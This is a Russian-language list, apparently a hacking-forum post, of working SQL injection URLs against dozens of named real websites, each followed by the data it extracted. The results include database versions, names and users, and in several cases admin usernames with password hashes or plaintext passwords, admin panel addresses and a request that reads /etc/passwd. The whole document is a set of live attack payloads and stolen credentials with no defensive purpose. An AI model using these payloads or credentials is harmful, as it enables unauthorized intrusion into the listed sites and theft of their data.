SQL Инъекции

http://www.karcherbg.com/newsview.php?id=-21+union+select+1,concat_ws(0x3a,version(),database(),useR()),3,4,5,6


Database Version: 5.0.67-community
Database name: karcherb_karcher
User name: karcherb_site@localhost

http://www.nmkconsult.com/services_details.php?id=-3+union+select+1,concat_ws(0x3a,version(),database(),useR()),3,4,5


Database Version: 5.0.67-community
Database name: nmkconsu_NMKCONSULT
User name: nmkconsu_site@localhost

Интересное дело, так как на сайте не было динамического параметра типа id= , я нашел вкладку новостей, но там всего лишь одна новость поэтому выглядело просто news.php , подтставил news.php?id=1 а дальше уже по класической схеме раскрутил скулю.

http://www.ekip6.net/bg/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),useR()),3,4,5,6,7,8,9

Database Version: 5.0.67-community-log
Database name: ekip6ne_Ekip6
User name: ekip6ne_site@localhost

 

Code:

http://www.harryhomers.co.uk/et/stats/hhs/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

harry_headsh@localhost:harry_statshhs:5.0.67-community

Code:

http://whetstats.sonyonline.de/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

[email protected]B480002:5.0.67-log

Code:

http://lapdclan.eu/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

lapdceba@localhost:usrdb_lapdceba_stats:5.0.51a

Code:

http://pro-q3dm6.de/27962/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

vsp@localhost:vsp:5.0.27

Code:

http://theaodclan.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

theaod_vspuser@localhost:theaod_vsp:5.0.67-community

Code:

http://www.wolfet.fr/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

vsp-stat@localhost:vspstat:5.0.32-Debian_7etch8-log

Code:

http://vsp.creativehosting.nl/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

[email protected]:vsp:5.0.32-Debian_7etch6-log

Code:

http://afterhourgamers.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

ahgamers_stats@localhost:ahgamers_stats:5.0.67-community

Code:

http://www.exiledunit.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

exiledun_stats@localhost:exiledun_stats:4.1.22-standard

 

site: kdvorik.ru

Code:

http://www.kdvorik.ru/katalog.php?r=-0+union+select+1,2,3,4,5,concat_ws(0x3a,name,email)+from+users--

database: 4.0.27-max-log
name_database: dvorik
user: [email protected]
http://www.kdvorik.ru/admin

column: users
log: asvitov
pass:
email: [email protected]

 

Code:

http://www.l-oko.ru/goonline.php?id=-1%27+union+select+1,2,concat_ws(0x3a,user_id,username,user_password),4,5,6,7,8+from+phpbb_users+limit+1,1+--+

 

http://www.tamaltd.com/bg/products.php?gr=-5+union+select+1,concat_ws(0x3a,version(),database(),useR()),3,4,5,6,7,8


Database Version: 4.1.20
Database name: tamaltd
User name: tamaltd@localhost


http://www.farin.bg/medcontent.php?pub=n&med=-5+union+select+1,concat_ws(0x3a,version(),database(),useR())



Database Version: 5.0.32-Debian_7etch5-log
Database name: wdbn
User name: mrtn@localhost

 

http://www.crossroadsdg.com/news_more.php?id=1+union+select+1,concat_ws(0x3a3a3a,id,username,password),3,4+from+users+--+

Вывод: 3:::admin:::6692e9c358a3031d

 

http://www.interay.eu/bg/product.php?brand=in_the_store&id=-9+union+select+1,concat_ws(0x3a,version(),database(),useR()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33



Database Version: 5.0.67-community
Database name: interay_interay
User name: interay_site@localhost



http://www.briz-bulgarian-properties.bg/en/property_details.php?id=-247+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),database(),useR()),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39


Database Version: 5.0.67-community
Database name: brizbg_BRIZ
User name: brizbg_site@localhost

 

http://www.wirelessgalaxy.com/headsets/productdetails.asp?productid=1+having+1=1--

Вывод: tblProducts.ProductID


http://www.wirelessgalaxy.com/headsets/productdetails.asp?productid=1+group+by+tblProducts.ProductID+having+1=1--

Вывод: tblProducts.ProductNam


http://www.wirelessgalaxy.com/headsets/productdetails.asp?productid=1+group+by+tblProducts.ProductID, tblProducts.ProductName+having+1=1--

Вывод: tblProducts.PartNo

 

http://www.rollco-bg.com/en/news_pop_en.php?id=-8+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),useR())


Database Version: 4.1.22
Database name: webrollco
User name: webrollco@webserv



http://www.longman-bulgaria.com/product.php?id=-137+union+select+1,2,3,concat_ws(0x3a,version(),database(),useR()),5,6,7,8,9,10,11,12,13

Database Version: 5.0.67-community
Database name: longman_longman
User name: longman_site@localhost

 

Code:

http://www.avnet.kuleuven.be/catalogus/showArticle.php?id=122+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16++from+mysql.user+limit+1,1/*

version():4.1.22-log
database():avnetweb
user():AVNetWEBuser@localhost

Code:

http://www.avnet.kuleuven.be/catalogus/showArticle.php?id=122+union+select+concat(user,0x3a,password),concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16++from+mysql.user+limit+1,1/*

root:58ca972b03220752

 

http://www.swstechnology.com/equipment_product.php?ID=-1'+union+select+1,concat_ws(0x3a,ID,Username,Password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+adminuser+--+

1:admin:24906u5j

 

http://www.adonay.bg/ru/galery_pop.php?id=-37+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6

Database Version: 5.0.67-community
Database name: adonayb_Adiabat
User name: adonayb_site@localhost



http://www.cartel-sa.com/en/news_details.php?id=-2+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8


Database Version: 5.0.67-community
Database name: cartelsa_cartel
User name: cartelsa_site@localhost

http://www.dmsbg.com/projects_details_actual.php?id=-89+union+select+1,concat_ws(0x3a,version(),database(),useR()),3,4,5,6,7,8,9,10,11&start=0



Database Version: 4.0.27-log
Database name: DMS
User name: dmsbg@localhost


http://www.atlanticgamma.com/en/presentation.php?id=-12+union+select+1,,3,4,5,6,7,8


Database Version: 5.0.67-community
Database name: atlantic_Atlantic
User name: atlantic_site@localhost


http://www.pixel.bg/portfolio_details.php?dejnost=4&id=-27+union+select+1,concat_ws(0x3a,version(),database(),useR()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18


Database Version: 5.0.67-community
Database name: pixelb_Pixel
User name: pixelb_site@localhost


http://www.atriumbulgarianrealestate.com/property_details.php?id=-492+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,concat_ws(0x3a,version(),database(),useR()),60,61

Database Version: 5.0.67-community
Database name: atriumbu_Atrium
User name: atriumbu_site@localhost


http://www.restaurant.bg/designs/inox2_en.php?id=-4192+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,concat_ws(0x3a,version(),database(),useR()),67,68,69,70


Database Version: 5.0.67-community
Database name: restaura_restaurant
User name: restaura_site@localhost


http://www.bar.bg/designs/inox2_en.php?id=-301+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,concat_ws(0x3a,version(),database(),useR()),67,68,69,70


Database Version: 5.0.67-community
Database name: barbg_bar
User name: barbg_site@localhost


http://www.real-estates.bg/en/property_details.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,concat_ws(0x3a,version(),database(),useR()),60



Database Version: 5.0.67-community
Database name: maxbgbg_MaxBG
User name: maxbgbg_site@localhost


http://www.bulgarianrealestates.bg/en/property_details.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,concat_ws(0x3a,version(),database(),useR()),60


Database Version: 5.0.67-community
Database name: maxbgbg_MaxBG
User name: maxbgbg_site@localhost


http://www.maxbg.bg/en/property_details.php?id=-7+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7


Database Version: 5.0.67-community
Database name: maxbgbg_MaxBG
User name: maxbgbg_site@localhost



ну и сайт компании которая создала все эти сайты

http://www.lemon.bg/news_details.php?id=28+and+substring((select+y=1..3() ),1,1)>x

y1=version
y2=database
y3=user

x1=53,46,48,46,54,55,45,99,111,109,109,117,110,105,116,121
x2=108,101,109,111,110,98,103,95,76,101,109,111,110
x3=108,101,109,111,110,98,103,95,115,105,116,101,64,108,111,99,97,108,104,111,115,116


Version :5.0.67-community
Database : lemonbg_Lemon
User : lemonbg_site@localhost

 

Code:

http://www.yogaold.com/index.php?ID=16&m=1&id=-133'+union+select+concat_ws(0x3a,version(),database(),user()),2/*

 

http://www.unity-online.ru/prod.php?ctov=pleers&where=model&all=4U&idm=-1+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+1,1/*

 

site: cultpohod.ru

Code:

http://www.cultpohod.ru/blockdetal.php?id=-267+union+select+1,2,3,4,5,concat_ws(0x3a3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

4.0.25::wwwcultpohodru::[email protected]

 

http://www.ghp.kodar.net/index.php?id=-66+union+select+1,2,3,concat_ws(0x3a,id,name,password),5,6,7+from+users/*

 

Code:

http://www.phos.be/newsletter/index.php?id=00062+union+select+1,2,3,concat(version(),0x3a,database(),0x3a,user()),5+limit+1,1

version():5.0.67-log
database()hos_phos
user()[email protected]

 

Code:

http://www.waza.org/virtualzoo/factsheet.php?id=106-007-0093-001'+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*&view=Monkeys
http://www.waza.org/virtualzoo/factsheet.php?id=106-007-0093-001'+union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+admins/*&view=Monkeys

administrator:648233e399d5b7f1dfe2f058fd24b391:mandoua
Админка:

Code:

http://waza.org/admin/

user(): wazaorg_wazaweb@localhost
database(): wazaorg_Network
version(): 4.1.25
PR: 7
---------------------------------------------------

Code:

http://www.eyemagazine.com/issue.php?id=18+and+substring((select+version()+from+information_schema.tables+limit+0,1),1,1)=5/*

user(): haymarket@localhost
database(): haymarket
version(): 5.0.22-Debian_0ubuntu6.06.11-log
PR: 6
---------------------------------------------------

Code:

http://www.all-media.info/page.php?id=19'+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7+limit+1,1/*
http://www.all-media.info/page.php?id=19'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7+limit+1,1/*

user(): all-media@localhost
database(): allmedia
version(): 4.1.18-standard
PR: 5

 

Code:

http://www.chateaudeseneffe.be/aVenirDetail.php?id=236+union+select+1,2,3,4,5,concat(version(),0x3a,database(),0x3a,user()),7,8,9,10,11/*

version():5.0.22-community-max-nt
database():chateaudeseneffe
user():[email protected]

 

http://www.positionsmart.co.za/admin/view_request.php?id=-6+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12/*